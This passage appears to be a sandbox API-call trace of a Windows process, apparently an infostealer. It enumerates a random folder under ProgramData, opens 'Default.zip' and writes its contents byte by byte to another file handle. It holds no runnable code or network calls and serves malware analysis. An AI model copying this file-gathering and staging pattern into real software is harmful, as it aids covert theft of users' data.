ftLastWriteTime.dwLowDateTime=0x34783edf, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0116.420] FindClose (in: hFindFile=0x7437a0 | out: hFindFile=0x7437a0) returned 1 [0116.420] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a36d0 [0116.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0116.420] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x39) returned 0x29a2df8 [0116.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads", cchWideChar=57, lpMultiByteStr=0x29a2df8, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads", lpUsedDefaultChar=0x0) returned 57 [0116.420] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2a08 [0116.420] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2df8 | out: hHeap=0x29a0000) returned 1 [0116.420] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a36d0 | out: hHeap=0x29a0000) returned 1 [0116.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6c0, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.420] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a6908 [0116.420] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6c0, cbMultiByte=4, lpWideCharStr=0x29a6908, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.420] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6908 | out: hHeap=0x29a0000) returned 1 [0116.420] PathMatchSpecW (pszFile="Downloads", pszSpec="*.*") returned 1 [0116.420] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a36d0 [0116.420] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970650 [0116.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0116.421] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x39) returned 0x29a29c0 [0116.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads", cchWideChar=57, lpMultiByteStr=0x29a29c0, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads", lpUsedDefaultChar=0x0) returned 57 [0116.421] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2c00 [0116.421] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a29c0 | out: hHeap=0x29a0000) returned 1 [0116.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Downloads", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0116.421] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xb) returned 0x29aab88 [0116.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Downloads", cchWideChar=11, lpMultiByteStr=0x29aab88, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\Downloads", lpUsedDefaultChar=0x0) returned 11 [0116.421] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aab88 | out: hHeap=0x29a0000) returned 1 [0116.421] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\downloads"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0116.421] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c00 | out: hHeap=0x29a0000) returned 1 [0116.421] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970650 | out: hHeap=0x29a0000) returned 1 [0116.421] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a36d0 | out: hHeap=0x29a0000) returned 1 [0116.421] DeleteFileW (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Downloads" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\downloads")) returned 0 [0116.421] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a08 | out: hHeap=0x29a0000) returned 1 [0116.421] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19ee38 | out: lpFindFileData=0x19ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35e81144, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x35f70500, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x35f70500, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Files", cAlternateFileName="")) returned 1 [0116.421] lstrcpyW (in: lpString1=0x19f088, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" [0116.421] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\" [0116.421] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\", lpString2="Files" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files" [0116.421] lstrcpyW (in: lpString1=0x19f290, lpString2="" | out: lpString1="") returned="" [0116.421] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0116.421] lstrcatW (in: lpString1="\\", lpString2="Files" | out: lpString1="\\Files") returned="\\Files" [0116.421] lstrcmpW (lpString1="Files", lpString2=".") returned 1 [0116.421] lstrcmpW (lpString1="Files", lpString2="..") returned 1 [0116.421] lstrcpyW (in: lpString1=0x19eb18, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files" [0116.421] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files\\*.*") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files\\*.*" [0116.421] FindFirstFileW (in: lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files\\*.*", lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35e81144, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x35f70500, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x35f70500, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7435a0 [0116.422] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files" [0116.422] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files\\" [0116.422] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files\\", lpString2="." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files\\.") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files\\." [0116.422] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Files" | out: lpString1="\\Files") returned="\\Files" [0116.422] lstrcatW (in: lpString1="\\Files", lpString2="\\" | out: lpString1="\\Files\\") returned="\\Files\\" [0116.422] lstrcatW (in: lpString1="\\Files\\", lpString2="." | out: lpString1="\\Files\\.") returned="\\Files\\." [0116.422] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0116.422] FindNextFileW (in: hFindFile=0x7435a0, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35e81144, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x35f70500, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x35f70500, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.422] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files" [0116.422] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files\\" [0116.422] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files\\", lpString2=".." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files\\..") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files\\.." [0116.422] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Files" | out: lpString1="\\Files") returned="\\Files" [0116.422] lstrcatW (in: lpString1="\\Files", lpString2="\\" | out: lpString1="\\Files\\") returned="\\Files\\" [0116.422] lstrcatW (in: lpString1="\\Files\\", lpString2=".." | out: lpString1="\\Files\\..") returned="\\Files\\.." [0116.422] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0116.422] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0116.422] FindNextFileW (in: hFindFile=0x7435a0, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35f70500, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x35f70500, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x36325465, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x16, dwReserved0=0x0, dwReserved1=0x0, cFileName="Default.zip", cAlternateFileName="")) returned 1 [0116.422] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files" [0116.422] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files\\" [0116.422] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files\\", lpString2="Default.zip" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files\\Default.zip") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files\\Default.zip" [0116.422] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Files" | out: lpString1="\\Files") returned="\\Files" [0116.422] lstrcatW (in: lpString1="\\Files", lpString2="\\" | out: lpString1="\\Files\\") returned="\\Files\\" [0116.422] lstrcatW (in: lpString1="\\Files\\", lpString2="Default.zip" | out: lpString1="\\Files\\Default.zip") returned="\\Files\\Default.zip" [0116.422] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x3970048 [0116.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files\\Default.zip", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0116.422] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x41) returned 0x38eb478 [0116.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files\\Default.zip", cchWideChar=65, lpMultiByteStr=0x38eb478, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files\\Default.zip", lpUsedDefaultChar=0x0) returned 65 [0116.423] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eabb0 [0116.423] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eb478 | out: hHeap=0x29a0000) returned 1 [0116.423] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0116.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.423] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a6858 [0116.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x29a6858, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.423] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6858 | out: hHeap=0x29a0000) returned 1 [0116.423] PathMatchSpecW (pszFile="Default.zip", pszSpec="*.*") returned 1 [0116.423] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x3970048 [0116.423] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700e0 [0116.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files\\Default.zip", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0116.423] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x41) returned 0x38eb6f8 [0116.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files\\Default.zip", cchWideChar=65, lpMultiByteStr=0x38eb6f8, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files\\Default.zip", lpUsedDefaultChar=0x0) returned 65 [0116.423] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x38eaaa8 [0116.423] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38eb6f8 | out: hHeap=0x29a0000) returned 1 [0116.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Files\\Default.zip", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0116.423] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x13) returned 0x3970c00 [0116.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Files\\Default.zip", cchWideChar=19, lpMultiByteStr=0x3970c00, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\Files\\Default.zip", lpUsedDefaultChar=0x0) returned 19 [0116.423] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970628 [0116.423] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970c00 | out: hHeap=0x29a0000) returned 1 [0116.423] GetLastError () returned 0x5 [0116.423] SetLastError (dwErrCode=0x5) [0116.423] GetLastError () returned 0x5 [0116.423] SetLastError (dwErrCode=0x5) [0116.423] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Files\\Default.zip" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\files\\default.zip"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x564 [0116.424] SetFilePointer (in: hFile=0x358, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x92 [0116.424] GetFileInformationByHandle (in: hFile=0x564, lpFileInformation=0x19de5c | out: lpFileInformation=0x19de5c) returned 1 [0116.424] GetFileSize (in: hFile=0x564, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x16 [0116.424] FileTimeToSystemTime (in: lpFileTime=0x19de1c, lpSystemTime=0x19de04 | out: lpSystemTime=0x19de04) returned 1 [0116.424] SetFilePointer (in: hFile=0x564, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.424] WriteFile (in: hFile=0x358, lpBuffer=0x19def3*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19def3*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.424] WriteFile (in: hFile=0x358, lpBuffer=0x19def3*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19def3*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.424] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.424] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.424] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.424] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.425] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.425] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.425] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.425] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.425] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.425] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.425] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.425] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.425] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.426] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.426] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.426] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.426] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.426] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.426] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.426] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.426] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.426] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 1 [0116.426] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19ded0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19ded0*=0x1, lpOverlapped=0x0) returned 1 [0116.427] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dec4, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dec4*=0x1, lpOverlapped=0x0) returned 1 [0116.427] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deb8, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deb8*=0x1, lpOverlapped=0x0) returned 1 [0116.427] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19deac, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19deac*=0x1, lpOverlapped=0x0) returned 1 [0116.427] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19dea0, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19dea0*=0x1, lpOverlapped=0x0) returned 1 [0116.427] WriteFile (in: hFile=0x358, lpBuffer=0x19defc*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19de94, lpOverlapped=0x0 | out: lpBuffer=0x19defc*, lpNumberOfBytesWritten=0x19de94*=0x1, lpOverlapped=0x0) returned 